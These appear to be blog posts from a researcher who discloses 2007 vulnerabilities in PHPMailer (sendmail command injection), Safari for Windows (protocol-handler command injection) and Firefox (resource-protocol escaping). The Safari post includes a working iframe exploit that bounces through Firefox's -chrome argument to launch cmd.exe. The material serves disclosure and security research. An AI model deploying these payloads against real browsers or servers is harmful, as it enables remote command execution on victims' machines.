Larholm.com

On June 11 I published an input validation vulnerability in PHPMailer, CVE-2007-3215. Since then, a number of applications have manually patched their PHPMailer source files and released updates.

• WordPress 2.2.1
• Symfony 1.0.5
• Debian DSA-1315-1 libphp-phpmailer
• knowledgeroot Knowledgebase 0.9.8.3
• IPplan 4.86a

Unfortunately, PHPMailer itself has not released an official update and is still being distributed with the vulnerable version 1.73 source files.

Judas Iscariote from the Swift Mailer project added a patch file to my original bug report (1734811), which seems to have been the most widely circulated manual patch.

I guess we can safely assume that PHPMailer is now a dormant project, which should be abandoned in favor of actively maintained projects such as Switch Mailer that from the looks of it has a more structured approach to security

This is not strictly security related, but I just had to write a few words about that OSI article. Rest assured that you will get some security news very soon, I found half a dozen new vulnerabilities in Safari for both Windows and OS X

Over at opensource.net Michael Tiemann, the president of the Open Source Initiative, has written an article about the apparent misuse of the term open source. He has declared that they (OSI) want to slam down on any vendor who claims to be open source but does not use “an OSI-approved license”. In his own words:

“Enough is enough. Open Source has grown up. Now it is time for us to stand up. I believe that when we do, the vendors who ignore our norms will suddenly recognize that they really do need to make a choice: to label their software correctly and honestly, or to license it with an OSI-approved license that matches their open source label.”

I generally applaud the Open Source Initiative for their dedication in promoting open source software, but the entire premise of this article does not ring true for me. This is my public comment to Michael Tiemann, originally posted as a comment to his article.

Read the rest of this entry »

Apple has just released version 3.01 of their Safari web browser, together with some release notes on their Security-announce mailing list. As you can see from those release notes the vulnerability that I discovered is one out of three that have been fixed, and as far as I can tell right now the vulnerability has indeed been fixed.

Quotes and whitespace is now filtered on any requests to external URL protocol handler applications, but other characters are still being passed without filtering so I expect to find some variations pretty soon

I want to congratulate Apple for fixing a serious security vulnerability in such a short time frame. Their usual response time can be counted in weeks to months. When I emailed them about the vulnerability it took them 2 days to even respond, which only happened after I asked for a non-automated reply. When I filed a bug on the WebKit tracker, bug 1481, nothing happened for a day except that some guy from ‘gentlyusedunderwear.com’ added himself to CC.

A beta version stays at the same version number until it is complete, so I guess this is positive confirmation that Safari 3 is not intended as a beta release.

As for myself, I am currently at work and will have to wait for some hours before I can dig really deep into the updated version of Safari.

Cheers

I went to the beach today at around 16:00 (4 PM) after having moderated all of your comments on my previous post “Safari for Windows, 0day exploit in 2 hours“. When I got back just now at 21:00 (9 PM) this site was no longer serving any content and a lot of people had mailed me to complain.

I am running WordPress and it was not all too happy about the abundance of visitors that came by my site today. In the last 12 hours more than 30.000 unique visitors generated more than 180.000 hits, which is quite a jump from my normal rate of 500 unique visitors per day. I guess you people like to read about security research, especially Slashdot, TechMeme and Reddit

Luckily I had the support of a great technical team, namely Tyron from HostGator.com where my site is hosted. After a brief live chat the site was back up and running just fine. I’m amazed at the level of support I have received so far from HostGator and am only happy to recommend them through the previous link (yes, it’s an affiliate signup).

So what happens next? First of all, I have read through all of your feedback about the PoC exploit and will do some tests on OS X tomorrow that will result in a positive or negative verification about whether the vulnerability can be adjusted to work on OS X as well.

Following that, I will continue to write about my security research and publish any new findings here - so remember to subscribe to my feed

Apple released version 3 of their popular Safari web browser today, with the added twist of offering both an OS X and a Windows version. Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser.

I downloaded and installed Safari for Windows 2 hours ago, when I started writing this, and I now have a fully functional command execution vulnerability, triggered without user interaction simply by visiting a web site. I will not sell this one to ZDI or iDefense but instead release it here, as I have done lately with a number of 0day vulnerabilities. This place is where you get my latest research

A bunch of other security researchers such as David Maynor and Aviv Raff have been pounding safariWin with their fuzzing tools, going through thousands upon thousands of test pages in the hopes of triggering some form of memory corruption for potential exploitation. I am a big fan of fuzzing and believe it can produce some tremendous results, but sometimes good old fashioned application specific knowledge can get you far.

The logic behind this vulnerability is quite simple and the vulnerability class has been known and understood for years, namely that of protocol handler command injection. A browser typically consists of a multitude of different URL schemes, some of which are handled by internal functions and others that are handed off to external applications. On the OS X platform Apple has enjoyed the same luxury and the same curse as Internet Explorer has had on the Windows platform, namely intimate operating system knowledge. The integration with the originally intended operating system is tightly defined, but the breadth of knowledge is crippled when the software is released on other systems and mistakes and mishaps occur. You can still find references to the OS X proprietary URL protocols open-help-anchor: and network-diagnostics: inside the resource files for the Windows release.

URL protocol handlers on the Windows platform work by executing a process with specific command line arguments. When Apple released Safari for the Windows platform they neglected to implement a proper level of input validation for these arguments, which means that you can break out of the intended confines and wreak havoc. A typical request for a URL such as myprotocol://someserver.com/someargument would be turned into a command line resembling the following.

“C:\Program Files\My Application\myprotocol.exe” “someserver.com/someargument”

This works almost as expected in Safari. With a simple link you cannot pass along arbitrary characters to the command line which is later executed and most attempts at doing so will simply be URL escape, such that myprotocol://someserver.com/some"[SPACE]argument is turned into

“C:\Program Files\My Application\myprotocol.exe” “someserver.com/some”%20argument

This cannot be used to exploit Safari as the command line to be executed is simply invalid. However, Safari does not properly validate the input when these same requests are handled through IFRAME elements, such as

<iframe src=’myprotocol://someserver.com” < foo > bar | foobar “arg1′></iframe>

which is turned into the following command line.

“C:\Program Files\My Application\myprotocol.exe” “someserver.com” < foo > bar | foobar “arg1″

As the knowledgeable reader might have noticed we now have everything we need to implement an attack against the entire range of available URL protocol handlers on the Windows platform. We could pick the telnet or callto protocols and provide unfiltered input to an argument of our choice. For this demonstration I have opted to attempt an exploit against the gopher: URL protocol which is handled by my local Firefox installation. We hash together an example request..

<iframe src=’gopher://larholm.com” |cmd /c echo “FOO’></iframe>

..Fire up procexp, launch safari and watch the output.

“C:\PROGRA~1\MOZILL~3\FIREFOX.EXE” -url “gopher://larholm.com” |cmd /c echo “FOO” -requestPending

Now this might be fun enough, but what if we wanted something a bit more customizable? Firefox is built on top of the Mozilla XPCOM platform and we might as well use some of these capable interfaces at our disposal to handle process instantiation. The code we want to execute is the following.

C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath(’C:\\windows\\system32\\cmd.exe’);
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);
alert(process);

Due to the levels of URL escaping the following might be a bit confusing to read, but feel free to dissect it for your own variations.


<iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath(’C:’+String.fromCharCode(92)
+String.fromCharCode(92)+’Windows’
+String.fromCharCode(92)+String.fromCharCode(92)+’System32′
+String.fromCharCode(92)+String.fromCharCode(92)+’cmd.exe’);
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);alert(process)’></iframe<


And there you have it, command execution. A fully functional PoC exploit is located below. Warning: This WILL crash your Safari browser on Windows. Close any existing Firefox processes that you might currently be running, then navigate Safari to the following page.

http://www.larholm.com/vuln/safaripoc.html

The above PoC exploit will exploit Safari by bouncing through Firefox via the Gopher protocol, passing on unfiltered input for the -chrome argument that Firefox exposes. When it has done this it will launch C:\Windows\System32\cmd.exe with any arguments that have been specified in the call to the process.run method.

It is important to know that, even though this PoC exploit uses Firefox, the actual vulnerability is within the lack of input validation for the command line arguments handed to the various URL protocol handlers on your machine. As such, there are a lot of different attack vectors for this vulnerability, I simply chose Firefox and the Gopher URL protocol because I was familiar with these.

I hope you enjoyed the fruits of my 2 hours of labour. Please feel free to add my RSS feed to your reader and come back again tomorrow or next week for a fresh batch of 0day vulnerabilities

Cheers
Thor Larholm

UPDATE
The site was down for a couple of hours due to Slashdot, TechMeme and Reddit.

PHPMailer is a widely deployed utility class used in PHP application to handle emails sent through sendmail, PHP mailto() or SMTP. It is used in PHP applications such as WordPress, Mantis, WebCalendar, Group-Office and Joomla. The last official release happened on July 11, 2005.

If you have configured PHPMailer to use sendmail it has a remote command execution vulnerability due to a lack of input validation. sendmail is queried through the popen function which is called with a string constructed from non-escaped user input.

Line 393 in the SendmailSend function in class.phpmailer.php has the vulnerable code. If the Sender property is set by the initiating script it is possible to execute arbitrary commands.

if ($this->Sender != "")
    $sendmail = sprintf("%s -oi -f %s -t", $this->Sendmail, $this->Sender);
else
    $sendmail = sprintf("%s -oi -t", $this->Sendmail);

if(!@$mail = popen($sendmail, "w"))

The Sender property is most typically set in the host application by reading the value of the e-mail field or comment forms, which is where most attack vectors will be found.

The solution of course is to properly escape the input with the escapeshellarg() or escapeshellcmd() functions.

Alternatively, you can enable the PHP feature safe_mode, though many PHP applications such as the TinyMCE spellchecker in WordPress will break as a result of this. The safe_mode documentation comes with a warning of its own:

The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren’t very realistic, many people, especially ISP’s, use safe mode for now.

I have notified PHPMailer about this on their SourceForge bug tracker, see issue 1734811

(For my german Heise visitors: Bleibt doch mal ein bischen und abonniert mein Feed, ich werde zusätzliche Schwachstellen veröffentlichen).

The patch from Bugzilla report 367428 that was introduced in Firefox 2.0.0.4 accidentally opens up the resource protocol to a separate input validation flaw. But first, a recap.

There were a number of interesting comments on my previous post, Firefox 0day local file reading. Checking the current Windows patch status was suggested by Sergey Vzloman and H D Moore highlighted what has now become general knowledge - that the directory traversal vulnerability in Firefox 2.0.0.3 is still present in the updated Firefox 2.0.0.4 under Linux/Unix and OS X.

The patch only closes the directory traversal aspect on Windows. You can still read local files in Firefox 2.0.0.4 on Windows, but it is now limited to the files within your Firefox installation directory such as update.xml and install.log that reveal your current Firefox patch status. It is still possible to determine the local installation path and query for the installation status of arbitrary plugin DLL’s, as I demonstrated with the PoC in my previous post. Non-Windows operating systems are still vulnerable to the full directory traversal vulnerability, allowing you to read any local files that your user account can reach.

Before the 2.0.0.4 patch the input to nsResProtocolHandler::ResolveURI was already checked to prevent any : characters from sneaking in, which can allow absolute URI references such as “res:C:boot.ini” or “res:http://www.google.com/”. This check is still in place in lines 334 to 336.

    // Don't misinterpret the filepath as an absolute URI.
    if (filepath.FindChar(':') != -1)
        return NS_ERROR_MALFORMED_URI;

Since the previous directory traversal vulnerability depended on URL-escaped characters such as %5C to work the patch added the currently present lines 338 to 340.

    NS_UnescapeURL(filepath);
    if (filepath.FindChar('\\') != -1)
        return NS_ERROR_MALFORMED_URI;

Since the filepath is now unescaped after the check for a : character has occurred, it is possible to inject : characters with the URL-escaped version %3A.

A non-malicious example request that can be used for verification is the following link include, which passes on unfiltered : characters to the host file system.

<link rel="stylesheet" href="resource://gre/browserconfig%3A.properties" />

It is also possible to pass on @ characters to the host file system, which at least on the Windows platform can be used to implement Basic Authentication style URI’s.

There are some odd URI resolver logic in nsIStandard::Resolve that I will still have to look into. Under some circumstances on Windows, I can get / characters translated into \ characters and have triple dots translated into double dots, which will once again allow the full directory traversal vulnerability. However, the output is flaky at best and I will have to do some tedious single stepping through the URI resolver logic code to determine at what point the input is unescaped twice